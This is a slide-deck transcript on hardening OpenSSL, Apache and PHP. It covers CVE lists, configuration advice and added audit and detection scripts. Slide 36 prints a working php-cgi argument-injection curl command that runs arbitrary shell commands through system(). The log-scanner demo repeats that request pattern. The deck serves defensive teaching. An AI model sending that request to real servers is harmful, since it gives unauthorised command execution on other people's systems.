Apache web-server-security
Andrew Carr
1.
OpenLogic by Perforce
© Perforce Software, Inc. ANDREW L. CARR | SR. ENTERPRISE ARCHITECT
2.
Confidentiality Statement
The information contained in this document is strictly confidential, privileged, and only for the information of the intended recipient. The information contained in this document may not be otherwise used, disclosed, copied, altered, or distributed without the prior written consent of Perforce Software, Inc.
3.
Overview
Aug 12, 2020
PHP, Apache and OpenSSL Vulnerabilities
Andrew Carr, Java Developer / Enterprise Architect; started professionally in 2001.
4.
Agenda
Path:
• Core concepts: review OpenSSL, review Apache hardening, review PHP hardening
• Modifying: modifying the configuration
• Removing: problematic modules and configurations
• Adding: modules that focus on security
5.
OpenSSL
6.
OpenSSL is a robust, commercial-grade, and full-featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
• Provides encryption tools
• Allows Apache / other web servers to encrypt traffic
• Provides a lot of other tools
7.
Encryption in Detail
Types of encryption:
• Symmetric key
• Public key
Definitions:
• Cipher: algorithm used for encryption or decryption
• Algorithm: procedure the encryption process follows
• Cryptanalysis: study of ciphers and cryptosystems to find weaknesses
8.
OpenSSL
• Between 1998 and 2010: 0.9.1 – 0.9.8
• Current version: 3.0, released 2020
• Companies currently run production with 0.9.8 – 1.1.x, 7 – 12 years old
9.
OpenSSL - CLI
• openssl version
• openssl version -a
• openssl ciphers -v (cipher list; use 'man ciphers' for more information)
• openssl speed (benchmark tool)
10.
Heartbleed
• The bug is in OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC 6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server.
• "Without using any privileged information or credentials we were able to steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication."
• Affects
  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable
• Mitigation
  • 1.0.1g or newer should be used.
  • -DOPENSSL_NO_HEARTBEATS.
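The version ranges above turned into a check a defender can run against a host's `openssl version -a` output. This is an added example, not code from the slides; it assumes the -DOPENSSL_NO_HEARTBEATS define shows up on the compiler line of `openssl version -a` when the build used it, and it relies on the version string alone, which vendor backports can leave unchanged.

```shell
#!/bin/sh
# Added example (not from the slides): classify an OpenSSL build as Heartbleed-
# affected from the text of `openssl version -a`, using the ranges on the slide:
# 1.0.1 through 1.0.1f affected; 1.0.1g and later, the 1.0.0 and 0.9.8 branches,
# and builds compiled with -DOPENSSL_NO_HEARTBEATS not affected. It assumes that
# define shows up on the "compiler:" line of `openssl version -a` when it was used.
# Caveat: distributions backport fixes without bumping the version string (a patched
# build can still report 1.0.1e), so treat VULNERABLE as "confirm via package changelog".

# heartbleed_status "<output of openssl version -a>"
# prints VULNERABLE | PATCHED | MITIGATED_NO_HEARTBEATS | NOT_AFFECTED | UNKNOWN
# exit status: 1 for VULNERABLE, 2 for UNKNOWN, 0 otherwise
heartbleed_status() {
    info="$1"
    # First line looks like "OpenSSL 1.0.1e-fips 11 Feb 2013"; keep just "1.0.1e".
    ver=$(printf '%s\n' "$info" | sed -n '1s/^OpenSSL \([0-9][0-9a-z.]*\).*/\1/p')
    if [ -z "$ver" ]; then
        echo UNKNOWN
        return 2
    fi
    case "$info" in
        *-DOPENSSL_NO_HEARTBEATS*) echo MITIGATED_NO_HEARTBEATS; return 0 ;;
    esac
    case "$ver" in
        1.0.1|1.0.1[a-f]) echo VULNERABLE;   return 1 ;;   # 1.0.1 .. 1.0.1f
        1.0.1[g-z])       echo PATCHED;      return 0 ;;   # 1.0.1g and later letters
        *)                echo NOT_AFFECTED; return 0 ;;   # 0.9.8, 1.0.0, 1.0.2+, 1.1.x, 3.x
    esac
}

# --demo runs constructed samples (not captured from real hosts); --live checks this host.
if [ "${1:-}" = "--demo" ]; then
    for s in 'OpenSSL 1.0.1e-fips 11 Feb 2013' 'OpenSSL 1.0.1g 7 Apr 2014' \
             'OpenSSL 1.0.0l 6 Jan 2014' 'LibreSSL 2.8.3' \
             'OpenSSL 1.0.1c 10 May 2012
compiler: gcc -DOPENSSL_NO_HEARTBEATS -O2'; do
        printf '%-36s %s\n' "$(printf '%s\n' "$s" | head -n 1)" "$(heartbleed_status "$s")"
    done
elif [ "${1:-}" = "--live" ]; then
    heartbleed_status "$(openssl version -a 2>/dev/null)"
fi
```

Run it with `--demo` to see every outcome on the constructed samples, or `--live` on a host; the exit status is what a fleet-wide script would collect.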
11.
Heartbleed in the Community
Venafi scan of the Forbes Global 2000: more than 0.5 million hosts are vulnerable.
What should they do? Upgrade SSL | Create new keys | Reissue certs
12.
OpenSSL - DoS
CVE-2017-3733
What is DoS?
Affected versions include 0.9.8 – 1.1.0 (not 1.0.2)
Mitigation
• Upgrade SSL – 1.1.0e
• Use OpenSSL 1.0.2
0.9.8 EOL – Dec 2015 (DO NOT USE)
13.
OpenSSL – How To Avoid Vulnerability
• Stay current - https://www.openssl.org/news/
• CVEs - https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=openssl
• OpenUpdate from OpenLogic
• Ensure your OpenSSL is up to date
14.
OpenSSL Vulnerabilities
• DROWN
  • A serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third parties being able to read the communication.
• HEARTBLEED
• M-I-T-M attack
• DoS vulnerabilities
• Other M-I-T-M
  • Symantec discovers a vulnerability that affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n, and 1.0.1o. Users of versions 1.0.2b and 1.0.2c are advised to immediately upgrade to 1.0.2d. Users of versions 1.0.1n and 1.0.1o are advised to immediately upgrade to 1.0.1p.
15.
OpenSSL Installation
OpenSSL is preinstalled on a lot of operating systems. Building is simple:
• Get the source
• Configure
• Compile
• Install
• Reference the new SSL when building other products
16.
OpenSSL Hardening
• Stay current
  • This is limited by other software's ability to update
• Normal network safety hardening
• There is a limit to what you can harden with OpenSSL specifically
• OpenSSL is used to support the applications we will harden
17.
Apache Web Server
18.
Apache Web Server
A community web server with prolific implementation.
Current versions: 2.4.29, 2.2.34 (FINAL)
2.2 was EOL'd June 2017, with security updates to December 2017.
Approx. 68 million public instances of Apache Web in use (builtwith.com); more than 70% use vulnerable versions.
19.
Apache Vulnerabilities
0-day – what is it?
2.2 vulnerabilities:
• OptionsBleed - CVE-2017-9798
  • Ignore the .htaccess file
• Uninitialized memory reflection – CVE-2017-9788
  • Affects 2.2.0 – 2.2.32 (fixed in .34)
  • Reveals confidential information
• Authentication bypass – CVE-2017-3167
20.
CVE Apache 2.2.22 Vulnerability
DoS
• http://www.cvedetails.com/cve/CVE-2014-0098/
• http://www.cvedetails.com/cve/CVE-2013-6438/
• http://www.cvedetails.com/cve/CVE-2014-0231/
• http://www.cvedetails.com/cve/CVE-2013-1896/
XSS
• http://www.cvedetails.com/cve/CVE-2012-4558/
• http://www.cvedetails.com/cve/CVE-2012-3499/
Code-Exec
• http://www.cvedetails.com/cve/CVE-2013-1862/
21.
Apache 2.2 Additional Vulnerabilities
• important: Uninitialized memory reflection in mod_auth_digest (CVE-2017-9788)
• important: ap_get_basic_auth_pw() Authentication Bypass (CVE-2017-3167)
• important: mod_ssl Null Pointer Dereference (CVE-2017-3169)
• important: ap_find_token() Buffer Overread (CVE-2017-7668)
• important: mod_mime Buffer Overread (CVE-2017-7679)
• important: Apache HTTP Request Parsing Whitespace Defects (CVE-2016-8743)
• n/a: HTTP_PROXY environment variable "httpoxy" mitigation (CVE-2016-5387)
• low: HTTP request smuggling attack against chunked request parser (CVE-2015-3183)
• important: mod_cgid denial of service (CVE-2014-0231)
• low: HTTP Trailers processing bypass (CVE-2013-5704)
• moderate: mod_deflate denial of service (CVE-2014-0118)
• moderate: mod_status buffer overflow (CVE-2014-0226)
• low: mod_log_config crash (CVE-2014-0098)
• moderate: mod_dav crash (CVE-2013-6438)
• low: mod_rewrite log escape filtering (CVE-2013-1862)
• moderate: mod_dav crash (CVE-2013-1896)
• low: XSS due to unescaped hostnames (CVE-2012-3499)
• moderate: XSS in mod_proxy_balancer (CVE-2012-4558)
• low: XSS in mod_negotiation when untrusted uploads are supported (CVE-2012-2687)
  • Note: This issue is also known as CVE-2008-0455.
• low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883)
• low: mod_proxy_ajp remote DoS (CVE-2012-4557)
• low: mod_setenvif .htaccess privilege escalation (CVE-2011-3607)
• low: mod_log_config crash (CVE-2012-0021)
• low: scoreboard parent DoS (CVE-2012-0031)
• moderate: mod_proxy reverse proxy exposure (CVE-2011-4317)
• moderate: error responses can expose cookies (CVE-2012-0053)
• low: mod_deflate DoS (CVE-2009-1891)
• low: AllowOverride Options handling bypass (CVE-2009-1195)
• low: CRLF injection in mod_negotiation when untrusted uploads are supported (CVE-2008-0456)
• moderate: APR-util off-by-one overflow (CVE-2009-1956)
• moderate: APR-util XML DoS (CVE-2009-1955)
• moderate: APR-util heap underwrite (CVE-2009-0023)
• important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2791)
• low: mod_proxy_ftp globbing XSS (CVE-2008-2939)
• low: mod_proxy_balancer CSRF (CVE-2007-6420)
• moderate: mod_proxy_http DoS (CVE-2008-2364)
• low: mod_proxy_ftp UTF-7 XSS (CVE-2008-0005)
• low: mod_proxy_balancer DoS (CVE-2007-6422)
• low: mod_proxy_balancer XSS (CVE-2007-6421)
• moderate: mod_status XSS (CVE-2007-6388)
• moderate: mod_imagemap XSS (CVE-2007-5000)
• moderate: mod_proxy crash (CVE-2007-3847)
• moderate: mod_status cross-site scripting (CVE-2006-5752)
• moderate: Signals to arbitrary processes (CVE-2007-3304)
• moderate: mod_cache information leak (CVE-2007-1862)
• moderate: mod_cache proxy DoS (CVE-2007-1863)
• important: mod_rewrite off-by-one error (CVE-2006-3747)
• low: mod_ssl access control DoS (CVE-2005-3357)
• moderate: mod_imap Referer Cross-Site Scripting (CVE-2005-3352)
• moderate: mod_proxy_ajp remote DoS (CVE-2011-3348)
• important: Range header remote DoS (CVE-2011-3192)
  • Advisory: CVE-2011-3192.txt
• moderate: apr_fnmatch flaw leads to mod_autoindex remote DoS (CVE-2011-0419)
• low: expat DoS (CVE-2009-3720)
• low: expat DoS (CVE-2009-3560)
• low: apr_brigade_split_line DoS (CVE-2010-1623)
• important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2068)
  • http://www.apache.org/dist/httpd/patches/apply_to_2.2.15/CVE-2010-2068-r953616.patch
  • http://www.apache.org/dist/httpd/patches/apply_to_2.3.5/CVE-2010-2068-r953418.patch
  • http://www.apache.org/dist/httpd/binaries/win32/mod_proxy_http-CVE-2010-2068.zip
• low: mod_cache and mod_dav DoS (CVE-2010-1452)
• important: mod_isapi module unload flaw (CVE-2010-0425)
• low: Subrequest handling of request headers (mod_headers) (CVE-2010-0434)
• moderate: mod_proxy_ajp DoS (CVE-2010-0408)
• low: mod_proxy_ftp DoS (CVE-2009-3094)
• low: mod_proxy_ftp FTP command injection (CVE-2009-3095)
• moderate: Solaris pollset DoS (CVE-2009-2699)
• low: APR apr_palloc heap overflow (CVE-2009-2412)
• important: mod_proxy reverse proxy DoS (CVE-2009-1890)
• important: mod_proxy_ajp information disclosure (CVE-2009-1191)
22.
Apache - Upgrading
Upgrade to 2.4: not that complicated; most setups that run 2.2 will run 2.4.
http://httpd.apache.org/docs/2.4/upgrading.html
2.2 configuration:
    Order deny,allow
    Deny from all
becomes:
    Require all denied
2.2 configuration:
    Order allow,deny
    Allow from all
becomes:
    Require all granted
23.
Critical Apache 2.4 Vulnerabilities
• CVE-2009-1891 (CWE-399)
  • mod_deflate allowing DDoS
  • Latest affected version is 2.2.11, but there are sporadic reports on early 2.4
• CVE-2009-1890 (CWE-189)
  • mod_proxy_http allowing DDoS via CPU locking
  • Latest version 2.3.2, some reports on 2.4.0 – .1
• CVE-2013-2249
  • mod_session_dbd module allowing arbitrary command execution via an HTTP request containing escape chars
  • Latest affected version 2.4.4
• CVE-2012-0883
  • envvars-std TROJAN HORSE injection
  • Version 2.4.2 is affected.
24.
Hardening Apache 2
• What is hardening?
• ServerSignature
  • Turn off
  • Prevents pages from displaying information about the server
• Turn off directory listings
  • Options
• Check for unused modules
  • httpd.conf
• Use groups / users
  • httpd.conf – User / Group
25.
Hardening Apache 2 (cont.)
• Use Allow and Deny on directories
  • <Directory> Deny from all
• Install mod_security
  • yum install mod_security (on Debian/Ubuntu: apt install libapache2-modsecurity)
• Use mod_evasive
• Disable symlinks
  • -FollowSymLinks
• Turn off server-side includes
  • -Includes
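An audit of the items on these two hardening slides, plus the 2.2-style Order/Allow/Deny access control that the upgrade slide replaces with Require. This is an added example, not code from the slides; it assumes the stock LoadModule names security2_module and evasive20_module, and ServerTokens is included beyond what the slides list.

```shell
#!/bin/sh
# Added example (not from the slides): audit an Apache httpd configuration, read
# from stdin, for the hardening items on the two Hardening Apache 2 slides
# (ServerSignature, directory listings, FollowSymLinks, server-side includes,
# User/Group, mod_security, mod_evasive) and for the 2.2-style Order/Allow/Deny
# access control that the upgrade slide says to replace with Require (on 2.4 the
# slide's "Deny from all" is written "Require all denied").
# ServerTokens is an addition beyond the slides. The LoadModule names
# (security2_module, evasive20_module) are the ones the stock modules register.
# Include directives are not followed: feed it the assembled configuration.

n=0
finding() { echo "FINDING: $1"; n=$((n+1)); }

# audit_httpd_conf < httpd.conf : prints one FINDING per issue, returns their count.
audit_httpd_conf() {
    n=0
    live=$(sed 's/#.*//')          # drop comments so commented-out directives don't count
    has() { printf '%s\n' "$live" | grep -Eiq "$1"; }

    has '^[[:space:]]*ServerSignature[[:space:]]+Off([[:space:]]|$)' \
        || finding "ServerSignature not set to Off (error pages reveal the server version)"
    has '^[[:space:]]*ServerTokens[[:space:]]+Prod([[:space:]]|$)' \
        || finding "ServerTokens is not Prod (Server header reveals version and modules)"

    # Options: Indexes, FollowSymLinks, Includes (or All, which implies them) count as
    # enabled unless written with a leading '-'.
    for opt in Indexes FollowSymLinks Includes All; do
        printf '%s\n' "$live" | grep -Ei '^[[:space:]]*Options([[:space:]]|$)' \
            | grep -Eiq "(^|[[:space:]+])${opt}([[:space:]]|$)" \
            && finding "Options enables $opt"
    done

    for d in User Group; do
        if ! has "^[[:space:]]*${d}[[:space:]]+[^[:space:]]"; then
            finding "$d directive missing (worker identity not set)"
        elif has "^[[:space:]]*${d}[[:space:]]+root([[:space:]]|$)"; then
            finding "$d is root"
        fi
    done

    has '^[[:space:]]*(Order|Allow[[:space:]]+from|Deny[[:space:]]+from)([[:space:]]|$)' \
        && finding "2.2-style Order/Allow/Deny access control; use Require on 2.4"
    has '^[[:space:]]*LoadModule[[:space:]]+security2_module' \
        || finding "mod_security not loaded"
    has '^[[:space:]]*LoadModule[[:space:]]+evasive' \
        || finding "mod_evasive not loaded"
    return "$n"
}

# --demo audits a constructed 2.2-era sample (not a real server's configuration);
# otherwise audit the file named on the command line, e.g. httpd.conf.
if [ "${1:-}" = "--demo" ]; then
    audit_httpd_conf <<'EOF'
ServerSignature On
ServerTokens Full
User root
Group root
<Directory "/var/www/html">
    Options Indexes FollowSymLinks Includes
    Order allow,deny
    Allow from all
</Directory>
EOF
    echo "$? finding(s)"
elif [ -n "${1:-}" ]; then
    audit_httpd_conf < "$1"
fi
```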
26.
PHP
27.
PHP 5-7
PHP is in use everywhere.
PHP 5 has over 500 vulnerabilities (mitre.org).
Upgrade to PHP 7. Lots of information on migration: http://php.net/manual/en/migration70.php
If you have to use 5, harden it.
28.
Remote Code Execution Vulnerability
• Affected versions
  • 7.3 to 7.3.10
• What is it?
  • Allows an attacker to execute remote code to gain control of system data
• How?
  • Bug #78559 (Heap buffer overflow in mb_eregi)
• Mitigation
  • Upgrade to 7.4
  • Apply security hardening principles, like least privilege
• Exploits
  • No current exploits known; that does not mean they don't exist
29.
PHP 5.5.9 Exploit – Moadmin
• Mongo admin tool
• Allows execution of code
• Not PHP's fault
• Large negative impact
30.
Hardening PHP
• Prevent fopen wrappers
  • allow_url_fopen
• Limit process time / input time
  • max_input_time
  • max_execution_time
• Limit script memory
  • memory_limit
• Turn register_globals off
  • register_globals
31.
Hardening PHP
• Don't expose PHP in the response
  • expose_php
• Only use redirect
  • cgi.force_redirect
• Impose input restrictions
  • post_max_size
  • max_input_vars
• Do not display error information
  • display_errors=0
  • display_startup_errors
32.
Hardening PHP
• Logging
  • log_errors=1
  • error_log = <path>
• Restrict file access
  • open_basedir = <path>
• File uploads
  • file_uploads = 0 <or> upload_max_filesize = 1M
• Session security
• Cookie security
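The directives on the three Hardening PHP slides as a php.ini audit. This is an added example, not code from the slides; the slide's 1M upload limit is kept, while the other ceilings and the session.cookie_* / session.use_strict_mode checks are this example's assumptions.

```shell
#!/bin/sh
# Added example (not from the slides): audit a php.ini against the directives on
# the three Hardening PHP slides. Booleans are compared with the expected value,
# numeric limits are parsed with PHP's K/M/G shorthand and compared with a ceiling,
# and error_log / open_basedir must be set. upload_max_filesize = 1M is the slide's
# value; the other ceilings and the session.* checks are this example's assumptions.
# register_globals was removed in PHP 5.4; when present it must be Off.
# Only the named file is read, not conf.d drop-ins; values containing "=" are cut.

n=0
finding() { echo "FINDING: $1"; n=$((n+1)); }

# ini_get <file> <directive>: value of the last uncommented assignment, or empty.
ini_get() {
    sed 's/[;#].*//' "$1" | awk -F= -v k="$2" '
        { key = $1; gsub(/^[ \t]+|[ \t]+$/, "", key)
          if (tolower(key) == tolower(k)) { v = $2; gsub(/^[ \t]+|[ \t]+$/, "", v); gsub(/"/, "", v) } }
        END { print v }'
}

# to_bytes <value>: PHP shorthand ("8M", "1024K", "-1" = unlimited) as a plain integer.
to_bytes() {
    v=$(printf '%s' "$1" | tr 'a-z' 'A-Z'); num=${v%[KMG]}
    case "$v" in
        *K) echo $((num * 1024)) ;;
        *M) echo $((num * 1024 * 1024)) ;;
        *G) echo $((num * 1024 * 1024 * 1024)) ;;
        -1) echo 9223372036854775807 ;;
        *)  echo "$num" ;;
    esac
}

expect_bool() {   # expect_bool <file> <directive> <on|off>
    raw=$(ini_get "$1" "$2" | tr 'A-Z' 'a-z')
    case "$raw" in on|1|true|yes) got=on ;; off|0|false|no|none) got=off ;; *) got="$raw" ;; esac
    if [ -z "$raw" ]; then finding "$2 not set (want $3)"
    elif [ "$got" != "$3" ]; then finding "$2 = $raw (want $3)"; fi
}

expect_max() {    # expect_max <file> <directive> <ceiling>
    raw=$(ini_get "$1" "$2"); eff=$raw
    [ "$2:$raw" = "max_execution_time:0" ] && eff=-1        # 0 means unlimited here
    if [ -z "$raw" ]; then finding "$2 not set (want <= $3)"
    elif [ "$(to_bytes "$eff")" -gt "$(to_bytes "$3")" ]; then finding "$2 = $raw (want <= $3)"; fi
}

expect_set() { [ -n "$(ini_get "$1" "$2")" ] || finding "$2 not set"; }

# audit_php_ini <file>: prints one FINDING per issue, returns their count.
audit_php_ini() {
    f="$1"; n=0
    expect_bool "$f" allow_url_fopen off
    expect_bool "$f" expose_php off
    expect_bool "$f" cgi.force_redirect on
    expect_bool "$f" display_errors off
    expect_bool "$f" display_startup_errors off
    expect_bool "$f" log_errors on
    expect_set  "$f" error_log
    expect_set  "$f" open_basedir
    expect_max  "$f" max_execution_time 30
    expect_max  "$f" max_input_time 60
    expect_max  "$f" memory_limit 128M
    expect_max  "$f" post_max_size 8M
    expect_max  "$f" max_input_vars 1000
    case "$(ini_get "$f" file_uploads | tr 'A-Z' 'a-z')" in   # slide: file_uploads = 0, or cap the size
        0|off|false|no) : ;;
        *) expect_max "$f" upload_max_filesize 1M ;;
    esac
    [ -z "$(ini_get "$f" register_globals)" ] || expect_bool "$f" register_globals off
    for d in session.cookie_httponly session.cookie_secure session.use_strict_mode; do
        expect_bool "$f" "$d" on
    done
    return "$n"
}

# --demo audits a constructed, weak PHP 5-era php.ini (not from any real host).
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp); cat > "$tmp" <<'EOF'
allow_url_fopen = On
expose_php = On
display_errors = On
log_errors = Off
max_execution_time = 0
memory_limit = -1
post_max_size = 64M
upload_max_filesize = 32M
register_globals = On
EOF
    audit_php_ini "$tmp"; echo "$? finding(s)"; rm -f "$tmp"
elif [ -n "${1:-}" ]; then
    audit_php_ini "$1"
fi
```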
33.
Building PHP 7
• sudo yum install git gcc gcc-c++ libxml2-devel pkgconfig openssl-devel bzip2-devel curl-devel libpng-devel libjpeg-devel libXpm-devel freetype-devel gmp-devel libmcrypt-devel mariadb-devel aspell-devel recode-devel autoconf bison re2c libicu-devel
• (Possibly) yum install bison
• sudo mkdir /usr/local/php7
• git clone https://github.com/php/php-src.git
• cd php-src
• git checkout PHP-7.4.9
• ./buildconf --force
• ./configure --prefix=/usr/local/php7 --with-config-file-path=/usr/local/php7/etc --with-config-file-scan-dir=/usr/local/php7/etc/conf.d --enable-bcmath --with-bz2 --with-curl --enable-filter --enable-fpm --with-gd --enable-gd-native-ttf --with-freetype-dir --with-jpeg-dir --with-png-dir --enable-intl --enable-mbstring --with-mcrypt --enable-mysqlnd --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-pdo-sqlite --disable-phpdbg --disable-phpdbg-webhelper --enable-opcache --with-openssl --enable-simplexml --with-sqlite3 --enable-xmlreader --enable-xmlwriter --enable-zip --with-zlib
• make && make install
(Note: against the PHP-7.4.9 source, configure warns that some of these options are unrecognized: mcrypt and --enable-gd-native-ttf were dropped in 7.2, and in 7.4 --with-gd, --with-jpeg-dir, --with-freetype-dir and --with-png-dir became --enable-gd, --with-jpeg and --with-freetype, while --enable-zip became --with-zip.)
34.
Building PHP 7
How to build:
• Get the source
• Get the dependencies
• Grab additional files for anything you want to enable
• ./configure --help is your friend
• Ask Perforce experts
35.
A Note About CGI Mode
What is it? A mode to serve (interpret) pages without a web server.
"Secure": this is supposed to be secure.
36.
Why CGI Mode is NOT Secure
Remote code execution: you are inviting this sort of attack.
Common exploits: there are several common exploits to take advantage of this.
curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' --data-binary "<?php system("$2"); die; ?>" "http://$1/cgibin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2d d+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"
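Detection for the request shape in that curl command, as an added example that is not from the slides: a scan over access-log lines that flags php-cgi argument injection (a query string without a literal `=` whose decoded form carries interpreter options). The log lines in the demo are constructed; field positions assume Common/Combined Log Format.

```shell
#!/bin/sh
# Added example (not from the slides): detection logic for the php-cgi argument-
# injection pattern in the slide's curl command, run over access-log lines.
# CGI hands a query string that contains no literal "=" to the program as
# command-line words (after %XX and "+" decoding), so "?%2dd+allow_url_include%3don"
# reaches php-cgi as "-d allow_url_include=on". The scan flags exactly that shape:
# raw query without "=", decoded query carrying an option-looking "-x" token.
# Input: Common/Combined Log Format on stdin, request target in field 7.
# The demo log lines are constructed; the addresses and paths are not real.

# scan_php_cgi_argv < access.log : prints "HIT <client> <target> :: <decoded query>"
scan_php_cgi_argv() {
    awk '
    function hex2dec(h,    v, i) {
        v = 0
        for (i = 1; i <= length(h); i++)
            v = v * 16 + index("0123456789abcdef", tolower(substr(h, i, 1))) - 1
        return v
    }
    # Decode %XX and "+" the way the CGI layer does before the interpreter sees argv.
    function urldecode(s,    out, i, hex) {
        gsub(/[+]/, " ", s)
        out = ""
        while ((i = index(s, "%")) > 0) {
            hex = substr(s, i + 1, 2)
            if (hex ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                out = out substr(s, 1, i - 1) sprintf("%c", hex2dec(hex))
                s = substr(s, i + 3)
            } else {                       # stray "%": keep it and move on
                out = out substr(s, 1, i)
                s = substr(s, i + 1)
            }
        }
        return out s
    }
    {
        target = $7
        q = index(target, "?")
        if (q == 0) next
        raw = substr(target, q + 1)
        if (index(raw, "=") > 0) next      # a literal "=" means GET parameters, not argv
        dec = urldecode(raw)
        # "-d ..." sets ini directives, "-n" skips php.ini, "-s" dumps source: all argv-only.
        if (dec ~ /(^| )-[A-Za-z]/)
            printf "HIT %s %s :: %s\n", $1, target, dec
    }'
}

# --demo scans three constructed log lines: one benign query, one php-cgi
# option injection like the slide's, and one "-s" source-disclosure probe.
if [ "${1:-}" = "--demo" ]; then
    scan_php_cgi_argv <<'EOF'
192.0.2.10 - - [12/Aug/2020:10:00:01 +0000] "GET /search.php?q=apache+hardening HTTP/1.1" 200 512
192.0.2.11 - - [12/Aug/2020:10:00:02 +0000] "POST /cgi-bin/php5?%2dd+allow_url_include%3don+%2dn HTTP/1.1" 200 233
192.0.2.12 - - [12/Aug/2020:10:00:03 +0000] "GET /index.php?-s HTTP/1.1" 200 1890
EOF
elif [ -n "${1:-}" ]; then
    scan_php_cgi_argv < "$1"
fi
```

Requests that hit are the ones the slide's cgi.force_redirect and open_basedir settings are meant to neutralise; the scan tells you whether anyone has been trying.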
37.
Hardening
• The web is your friend!!!
• Anti-clickjacking and other practices
  • https://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/f
• Linux hardening of Apache
  • https://wiki.debian.org/Apache/Hardening
• PHP hardening
  • http://www.hardened-php.net/
38.
Q & A